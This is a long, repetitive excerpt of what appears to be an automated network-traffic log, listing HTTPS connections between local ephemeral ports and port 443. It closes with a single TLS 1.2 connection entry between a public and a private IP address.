Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52920
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56051
Source: unknown Network traffic detected: HTTP traffic on port 53363 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56294
Source: unknown Network traffic detected: HTTP traffic on port 55979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56295
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 54848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 55831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 52815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52947
Source: unknown Network traffic detected: HTTP traffic on port 52919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54482 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 52152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 54997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 52737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56479
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54063
Source: unknown Network traffic detected: HTTP traffic on port 52207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55397
Source: unknown Network traffic detected: HTTP traffic on port 52176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52451 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55398
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56480
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56240
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54064
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 56332 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 55041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55159
Source: unknown Network traffic detected: HTTP traffic on port 55280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55602 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56497
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55160
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 52219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 52164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55636 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56499
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56258
Source: unknown Network traffic detected: HTTP traffic on port 52555 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55176
Source: unknown Network traffic detected: HTTP traffic on port 56240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 56070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 52142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56277
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53467 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 54588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54934
Source: unknown Network traffic detected: HTTP traffic on port 55432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54932
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55484 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52529
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52764
Source: unknown Network traffic detected: HTTP traffic on port 52504 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54719
Source: unknown Network traffic detected: HTTP traffic on port 52160 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52531
Source: unknown Network traffic detected: HTTP traffic on port 55500 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53623
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53621
Source: unknown Network traffic detected: HTTP traffic on port 54091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54547 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55811
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55812
Source: unknown Network traffic detected: HTTP traffic on port 52212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52791
Source: unknown Network traffic detected: HTTP traffic on port 54525 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56368 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52712
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52711
Source: unknown Network traffic detected: HTTP traffic on port 52477 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56088
Source: unknown Network traffic detected: HTTP traffic on port 53232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55534 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53465 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52737
Source: unknown Network traffic detected: HTTP traffic on port 52244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54912
Source: unknown Network traffic detected: HTTP traffic on port 52139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53829
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52739
Source: unknown Network traffic detected: HTTP traffic on port 55722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52972
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52503
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52504
Source: unknown Network traffic detected: HTTP traffic on port 52184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53831
Source: unknown Network traffic detected: HTTP traffic on port 55568 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56534 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52239
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54418
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52234
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54653
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52231
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52232
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52479
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53569
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52477
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55500
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52236
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52240
Source: unknown Network traffic detected: HTTP traffic on port 52146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53571
Source: unknown Network traffic detected: HTTP traffic on port 56107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54568 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52375 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55518
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52245
Source: unknown Network traffic detected: HTTP traffic on port 54911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55516
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52246
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53336
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53335
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55996
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54439
Source: unknown Network traffic detected: HTTP traffic on port 52158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53103
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown Network traffic detected: HTTP traffic on port 52215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54674
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54438
Source: unknown Network traffic detected: HTTP traffic on port 56051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56221 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53596
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53595
Source: unknown Network traffic detected: HTTP traffic on port 55618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55774
Source: unknown Network traffic detected: HTTP traffic on port 52868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55533
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52269
Source: unknown Network traffic detected: HTTP traffic on port 53517 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55534
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53363
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52271
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53361
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55550 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55704
Source: unknown Network traffic detected: HTTP traffic on port 54395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54610
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55703
Source: unknown Network traffic detected: HTTP traffic on port 52213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54611
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52208
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52209
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54869
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52207
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52200
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52201
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52685
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52204
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52205
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52202
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52687
Source: unknown Network traffic detected: HTTP traffic on port 53907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52217
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52218
Source: unknown Network traffic detected: HTTP traffic on port 53621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52211
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53543
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54631
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52451
Source: unknown Network traffic detected: HTTP traffic on port 52193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52452
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55960
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55720
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52214
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53544
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54633
Source: unknown Network traffic detected: HTTP traffic on port 52400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52228
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52229
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53699 -> 443
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49705 version: TLS 1.2
